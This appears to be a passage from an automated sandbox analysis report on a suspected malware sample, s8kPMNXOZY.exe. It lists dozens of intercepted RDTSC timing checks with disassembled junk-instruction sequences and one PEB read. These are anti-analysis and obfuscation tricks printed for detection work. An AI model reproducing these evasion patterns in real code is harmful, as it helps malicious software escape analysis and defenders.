Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48410 second address: B48440 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6FA127EBE8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6FA127EBDFh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B49D07 second address: B49D3E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6FA0B89506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6FA0B89514h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F6FA0B8950Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F6FA0B89506h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B49D3E second address: B49D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B49D42 second address: B49D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCCF second address: B4FCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6FA127EBD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCE0 second address: B4FCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCE4 second address: B4FCE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCE8 second address: B4FCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCEE second address: B4FD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F6FA127EBE7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FD11 second address: B4FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B50038 second address: B5003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B5003C second address: B50076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89516h 0x00000007 jmp 00007F6FA0B89517h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501D5 second address: B501DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501DB second address: B501EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007F6FA0B89506h 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501EA second address: B501F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501F7 second address: B50202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B50202 second address: B50208 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B505F0 second address: B50604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89510h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B508BE second address: B508C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B508C4 second address: B508CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B50A33 second address: B50A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B511E2 second address: B511E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B511E8 second address: B511F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B511F0 second address: B51218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6FA0B89516h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58938 second address: B58949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6FA127EBD6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58949 second address: B5894E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58BE2 second address: B58BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58BE8 second address: B58BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B66EAE second address: B66EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B66EC2 second address: B66EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B66915 second address: B6691B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B6C1EB second address: B6C1F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6FA0B8950Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B6BEFD second address: B6BF1B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F6FA127EBD8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jg 00007F6FA127EBD6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B6BF1B second address: B6BF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B73924 second address: B7392E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6FA127EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B79E51 second address: B79E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F6FA0B89506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B79D02 second address: B79D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F5B second address: B81F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B89515h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F74 second address: B81F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F78 second address: B81F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F7E second address: B81F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jl 00007F6FA127EBD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80BFC second address: B80C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6FA0B8950Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80ECE second address: B80ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80ED4 second address: B80EE5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80EE5 second address: B80EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80EEC second address: B80EF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6FA0B8950Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B8104E second address: B81067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F6FA127EBD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e jnp 00007F6FA127EBD6h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81067 second address: B8106B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86508 second address: B8650C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B8650C second address: B86512 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86512 second address: B86518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86518 second address: B8653A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6FA0B89506h 0x00000009 jmp 00007F6FA0B89517h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86692 second address: B8669C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA127EBDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B8669C second address: B866A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C21 second address: BC1C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C27 second address: BC1C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C2B second address: BC1C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C31 second address: BC1C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F6FA0B89517h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C5F second address: BC1C69 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C69 second address: BC1C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF2A second address: A9BF3A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA127EBE2h 0x00000008 jc 00007F6FA127EBD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF3A second address: A9BF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF41 second address: A9BF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF4F second address: A9BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF55 second address: A9BF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBDAh 0x00000009 popad 0x0000000a jne 00007F6FA127EBDAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF6E second address: A9BF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89518h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BD82A9 second address: BD82DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE7h 0x00000007 push ecx 0x00000008 jmp 00007F6FA127EBE7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BD7DCB second address: BD7DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BD7FA3 second address: BD7FBA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA127EBDBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5FF1 second address: CA5FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5FF9 second address: CA604B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F6FA127EBD6h 0x00000009 jmp 00007F6FA127EBE4h 0x0000000e pop edx 0x0000000f jc 00007F6FA127EBDEh 0x00000015 jg 00007F6FA127EBD6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 jc 00007F6FA127EBD6h 0x00000028 push edi 0x00000029 pop edi 0x0000002a pop edi 0x0000002b jmp 00007F6FA127EBE8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA604B second address: CA606D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89514h 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E16 second address: CA4E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E1A second address: CA4E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA0B8950Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E32 second address: CA4E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E36 second address: CA4E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA50DA second address: CA50F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F6FA127EBD6h 0x00000011 jo 00007F6FA127EBD6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA522D second address: CA5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56D5 second address: CA56E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56E3 second address: CA56F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89511h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56F9 second address: CA56FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56FF second address: CA5705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5705 second address: CA5711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5711 second address: CA5725 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6FA0B89512h 0x0000000c je 00007F6FA0B89506h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5AE1 second address: CA5B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6FA127EBD6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d jg 00007F6FA127EBD8h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jbe 00007F6FA127EBDCh 0x0000001b jno 00007F6FA127EBE4h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5B1C second address: CA5B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5B20 second address: CA5B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CAA09D second address: CAA0BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F6FA0B89506h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F6FA0B8950Dh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90031 second address: 6E90037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90037 second address: 6E900AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6FA0B89514h 0x0000000f pushfd 0x00000010 jmp 00007F6FA0B89512h 0x00000015 sub cx, F468h 0x0000001a jmp 00007F6FA0B8950Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F6FA0B89516h 0x00000027 mov ebp, esp 0x00000029 jmp 00007F6FA0B89510h 0x0000002e mov eax, dword ptr fs:[00000030h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900AF second address: 6E900B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900B3 second address: 6E900B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900B7 second address: 6E900BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
